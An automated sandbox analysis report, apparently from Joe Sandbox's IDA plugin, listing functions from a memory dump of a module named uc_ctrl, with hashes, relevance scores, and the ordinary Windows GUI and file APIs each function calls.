Opcode ID: 211bea851dce35c17ec300d69a15a8c44832097f4116703e0d09afa80dcb8e53
Instruction ID: 7dd85ce01478d30c246b932d10e2a492969d5fcb7764f84b0e115f3d2186cd89
Opcode Fuzzy Hash: 211bea851dce35c17ec300d69a15a8c44832097f4116703e0d09afa80dcb8e53
Instruction Fuzzy Hash: BF0121B0A41741AFEB50CFB48809B597AF4BB0A745F844A1DA256D7FD0E7B48605CB05

Function 6CB2756F Relevance: 14.0, APIs: 9, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a06a0b8b4d9442349200a15fe095569ba9c3665f6ce74fe90141c168be570721
Instruction ID: 1d2999916651487d50b5d5f01b16ab5a2aa97d84a1162a74bc8156e13425a876
Opcode Fuzzy Hash: a06a0b8b4d9442349200a15fe095569ba9c3665f6ce74fe90141c168be570721
Instruction Fuzzy Hash: D1F1CD31900645DBCB02DFADC484DAEBBB6FF4A314F158158E819BB700E775AC91CBA9

Function 6CB41BE3 Relevance: 13.9, APIs: 9, Instructions: 380windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB41BEA
SendMessageW.USER32(?,000000B0,?,?), ref: 6CB41C04
MessageBeep.USER32(000000FF), ref: 6CB41CB6
MessageBeep.USER32(000000FF), ref: 6CB4202E

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message$Beep$H_prolog3Send
String ID:
API String ID: 491126482-0
Opcode ID: 0070c0eadee18b2af17af83e5fba9df8367f856a75822ab173f1f3f9dfd731d4
Instruction ID: f188c8dfaf6831ac8a860c53a3eadeb1801045ef748c079f9ae050d07f20e591
Opcode Fuzzy Hash: 0070c0eadee18b2af17af83e5fba9df8367f856a75822ab173f1f3f9dfd731d4
Instruction Fuzzy Hash: 5FE18CB1E0915AABCF05CFA4C884AEEBBB9FF48304F188119E511B7B44DB30AD55DB61

Function 6CB32AB7 Relevance: 13.8, APIs: 9, Instructions: 265COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB32ABE

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID:
API String ID: 3670251406-0
Opcode ID: 0f7d44118ac921a4169ebc38b1c48b480ab6dab0f1c4c32a7b78ebb3db847dbc
Instruction ID: 35059e27a826dda4e1bcad793c7873284d42dbc99e70ff0ac5093cd3f8f63b4d
Opcode Fuzzy Hash: 0f7d44118ac921a4169ebc38b1c48b480ab6dab0f1c4c32a7b78ebb3db847dbc
Instruction Fuzzy Hash: CDA1D070A01266DFDB09CF68C858AAEB7B1FF49310F151108E915A7B91DB30ED21CBE6

Function 6CB20296 Relevance: 13.7, APIs: 9, Instructions: 249filecomCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB2029D
OleDuplicateData.OLE32(?,?,00000000), ref: 6CB2032A
GlobalLock.KERNEL32(00000000,00000054), ref: 6CB20358
CopyMetaFileW.GDI32(?,00000000), ref: 6CB20366
GlobalUnlock.KERNEL32(00000000), ref: 6CB20374
GlobalFree.KERNEL32(00000000), ref: 6CB2037B
GlobalUnlock.KERNEL32(00000000), ref: 6CB20383

Part of subcall function 6CB1A044: __EH_prolog3.LIBCMT ref: 6CB1A0F2

_wcslen.LIBCMT ref: 6CB203F5
CopyFileW.KERNEL32(?,?,00000000,?,?,00000054), ref: 6CB20525

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Global$CopyFileUnlock$DataDuplicateFreeH_prolog3H_prolog3_LockMeta_wcslen
String ID:
API String ID: 2256172175-0
Opcode ID: 2b70f27a8cfe448b381694a4caee7d9f3fafaa01a33b91aacbfe50acfc9c6e61
Instruction ID: 3999298b22d6637baca9f0e835ce96d36ecc176012e489b106603081510b5f24
Opcode Fuzzy Hash: 2b70f27a8cfe448b381694a4caee7d9f3fafaa01a33b91aacbfe50acfc9c6e61
Instruction Fuzzy Hash: D48181B1650581EFDB148F68D9A9A7BBBB9FF49304704821CE41ACBB50EB34EC14CB65

Function 6CB4843B Relevance: 13.7, APIs: 9, Instructions: 219COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 6CB484D2
InvalidateRect.USER32(?,?,00000001), ref: 6CB4853B
InvalidateRect.USER32(?,?,00000001), ref: 6CB4854A

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$Invalidate$Empty
String ID:
API String ID: 1126320529-0
Opcode ID: 8f6f24abd7bf81f6c1ec98c28fc1e8978478fd37b9157665c063b646bb1db845
Instruction ID: 478900e91e889fa35f4ca6797f9d31d444b290435643d762c7837def55de5dbc
Opcode Fuzzy Hash: 8f6f24abd7bf81f6c1ec98c28fc1e8978478fd37b9157665c063b646bb1db845
Instruction Fuzzy Hash: 70813571A002199FDF05DF68C884AAE77B6FF49314F1440AAEC11AB764EB75AE01CF91

Function 6CB59FBB Relevance: 13.7, APIs: 9, Instructions: 196fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB59FC5
GetModuleFileNameW.KERNEL32(00000000,?,00000104,6CC84214,00000000,6CC8E0E8,00000000,6CC8444C,00000000,?,?,00000A38,6CB5AF92,?,00000000,00000038), ref: 6CB5A05C
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,6CC8444C,00000000,?,?,00000A38,6CB5AF92,?,00000000,00000038), ref: 6CB5A0FE
GetFileSize.KERNEL32(00000000,00000000), ref: 6CB5A10E
CloseHandle.KERNEL32(00000000), ref: 6CB5A117

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: File$CloseCreateH_prolog3_HandleModuleNameSize
String ID:
API String ID: 2198494350-0
Opcode ID: dc323fec5fe607e25ea193a27f58109e8e16bd84bb4a6d6112a2f7ed9fbd6c69
Instruction ID: 5f488a1a8c8f58c1ff3baaf85f240d85696cadc45f8f1b715f243327c54d02c9
Opcode Fuzzy Hash: dc323fec5fe607e25ea193a27f58109e8e16bd84bb4a6d6112a2f7ed9fbd6c69
Instruction Fuzzy Hash: CD61E672900254AADB209F24CC88FEF777CEF8A724F544169F515A7980EB309A99CF71

Function 6CB3670F Relevance: 13.6, APIs: 9, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6CB36729
GetWindowLongW.USER32(00000000,000000F0), ref: 6CB36738
IsWindowEnabled.USER32(00000000), ref: 6CB36746
GetDlgItem.USER32(?), ref: 6CB3675C
GetWindowLongW.USER32(00000000,000000F0), ref: 6CB36767
IsWindowEnabled.USER32(00000000), ref: 6CB36775
GetFocus.USER32 ref: 6CB36793
IsWindowEnabled.USER32(00000000), ref: 6CB3679A
SetFocus.USER32(00000000), ref: 6CB367A5

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$Enabled$FocusItemLong
String ID:
API String ID: 1558694495-0
Opcode ID: 4fe589c562b5bd1a70908e98feb61e120bd56856f6e6e22b412a97e60a432cf0
Instruction ID: f92ef56888129e9a3bedbd6858e1201713094abe5fe562e91eaf8c95c3437a04
Opcode Fuzzy Hash: 4fe589c562b5bd1a70908e98feb61e120bd56856f6e6e22b412a97e60a432cf0
Instruction Fuzzy Hash: DD11E231306261ABDE021B69CD5CB6FBF39FF07395B442120FD29D2660EB34D8118B81

Function 6CB3F477 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 256windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB3F481
SendMessageW.USER32(?,000000B9,00000001,00000000), ref: 6CB3F563

Part of subcall function 6CB28CB2: GetWindowTextLengthW.USER32(?), ref: 6CB28CC3
Part of subcall function 6CB28CB2: GetWindowTextW.USER32(?,00000000,00000000), ref: 6CB28CDA

SendMessageW.USER32(?,000000B9,00000001,00000000), ref: 6CB3F7C5
GetParent.USER32(?), ref: 6CB3F7E1
GetParent.USER32(?), ref: 6CB3F7F4
RedrawWindow.USER32(?,00000000,00000000,00000481,00000000), ref: 6CB3F80C

Part of subcall function 6CB1A044: __EH_prolog3.LIBCMT ref: 6CB1A0F2

Strings

*?<>|, xrefs: 6CB3F62B

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$MessageParentSendText$H_prolog3H_prolog3_LengthRedraw
String ID: *?<>|
API String ID: 2000328439-3491500753
Opcode ID: 0505afb670e2945f8337aa59bedb3743df5a9177da1f5915841da294adc3858b
Instruction ID: 01746320def52720130a8141e17fd47383a8be1a0446fc7b2de07e68cee4944d
Opcode Fuzzy Hash: 0505afb670e2945f8337aa59bedb3743df5a9177da1f5915841da294adc3858b
Instruction Fuzzy Hash: DBA18A70A041AADBDB14DB64CD94BEDB776EF84308F0042E8D51967AA0DF39AE58CF11

Function 6CB3F87B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00000000,?), ref: 6CB3F8C3
SetRectEmpty.USER32(?), ref: 6CB3F8E9

Part of subcall function 6CB26387: SetBkMode.GDI32(?,?), ref: 6CB2639B
Part of subcall function 6CB26387: SetBkMode.GDI32(?,?), ref: 6CB263AD

__EH_prolog3_GS.LIBCMT ref: 6CB3F8FE
InflateRect.USER32(?,000000FF,000000FE), ref: 6CB3FA7A
OffsetRect.USER32(?,00000000,000000FE), ref: 6CB3FA88
OffsetRect.USER32(?,00000001,00000001), ref: 6CB3FA9C

Strings

..., xrefs: 6CB3FAA2

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$ModeOffset$EmptyH_prolog3_InflateWindow
String ID: ...
API String ID: 3827798281-440645147
Opcode ID: 2932f526413be9123af8714058cb985fd682bbe611c294c184cceaf2a411d089
Instruction ID: fbb9f525b23d70a1c4a0fa3cb1cd3731134ba96f6c0af6660dabb5618e7ca84f
Opcode Fuzzy Hash: 2932f526413be9123af8714058cb985fd682bbe611c294c184cceaf2a411d089
Instruction Fuzzy Hash: 2D81BD30A01629AFCF04CF68C894AEDB7B6FF49314F141269E919AB790EB34E905CF50

Function 6CB372F3 Relevance: 12.5, APIs: 8, Instructions: 472COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB372FA
_wcslen.LIBCMT ref: 6CB373A3
_wcslen.LIBCMT ref: 6CB373AF
_wcslen.LIBCMT ref: 6CB37424
_memcpy_s.LIBCMT ref: 6CB3746F
_wcslen.LIBCMT ref: 6CB3748A
_memcpy_s.LIBCMT ref: 6CB374D8

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

PathRemoveFileSpecW.SHLWAPI(?,?,?,00000000), ref: 6CB37615

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: _wcslen$_memcpy_s$Exception@8FileH_prolog3PathRemoveSpecThrow
String ID:
API String ID: 853645266-0
Opcode ID: 727c34faac9baca3c101034a6cf21b04aa9b951efe177901843de33b2b6c8bac
Instruction ID: 436ac3bd5bceed11744a61f94b9d5c869ef58938e2a965ee0f0430fa133d10b9
Opcode Fuzzy Hash: 727c34faac9baca3c101034a6cf21b04aa9b951efe177901843de33b2b6c8bac
Instruction Fuzzy Hash: 4302D170E02666CFDB04CF68C950AAE77B6EF84314F14916DD829BBB90DB709906CB61

Function 6CB389E0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 147COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 6CB38A69
_wcslen.LIBCMT ref: 6CB38AF6

Strings

ZA1, xrefs: 6CB38A45
ZA1, xrefs: 6CB38B15, 6CB38A88
ZA1, xrefs: 6CB389E8
A, xrefs: 6CB38A15
1, xrefs: 6CB38A04

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: _wcslen
String ID: 1$A$ZA1$ZA1$ZA1
API String ID: 176396367-2337498304
Opcode ID: eb5aefdadfd73ef612e64e30590f54ba30c75def1d6cf11b22cd7adbad95e7f9
Instruction ID: 1d8f2df064f5ea30ab3b39e4841a6791ab962bc48d8d27c50342eafc53cd3f9b
Opcode Fuzzy Hash: eb5aefdadfd73ef612e64e30590f54ba30c75def1d6cf11b22cd7adbad95e7f9
Instruction Fuzzy Hash: 6041247290036BDBDB109FA8D8117AE73B1EB40714FA09517E949DB984E3B26AC3C753

Function 6CB4B0F6 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103windowmemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB4B0FD
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,00000078), ref: 6CB4B11A

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

SHGetDesktopFolder.SHELL32(?), ref: 6CB4B12F
GlobalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 6CB4B144
SendMessageW.USER32 ref: 6CB4B1FF
SendMessageW.USER32(00000001,00001102,00000002,00000000), ref: 6CB4B210

Strings

g, xrefs: 6CB4B13D

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: FolderMessageSend$AllocDesktopException@8GlobalH_prolog3LocationSpecialThrow
String ID: g
API String ID: 4142625628-30677878
Opcode ID: 050ba754aa4380b0b0abdf458e3c049a99fb35bcacbcfb0547a32ef4c3a36314
Instruction ID: c442f11ce81b7c5ab8cbc1bdf111cfb01a04911111e00308c1060615d975d4e1
Opcode Fuzzy Hash: 050ba754aa4380b0b0abdf458e3c049a99fb35bcacbcfb0547a32ef4c3a36314
Instruction Fuzzy Hash: 1F417AB0A006299FDF10DFA8CC48BEEBBB9FF49714F000168E615AB790EB749905CB54

Function 6CB4B5B1 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,?), ref: 6CB4B5F7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 6CB4B631
SendMessageW.USER32(?,00001102,00008001,?), ref: 6CB4B673

Part of subcall function 6CB4AF76: __EH_prolog3.LIBCMT ref: 6CB4AF7D
Part of subcall function 6CB4AF76: SendMessageW.USER32(?,0000113E,00000000,?), ref: 6CB4AFBF

SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 6CB4B6B9

Strings

@, xrefs: 6CB4B616

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$H_prolog3
String ID: @
API String ID: 1885053084-2766056989
Opcode ID: 290c8b2e71b12035a2e71b98974024eb15c8ea304c86135a0c42fe9e33bac2cc
Instruction ID: 7a42d5f03c2077cbd92609978ec66cb8ce57d85ef7cec9d4a16b126785b32b34
Opcode Fuzzy Hash: 290c8b2e71b12035a2e71b98974024eb15c8ea304c86135a0c42fe9e33bac2cc
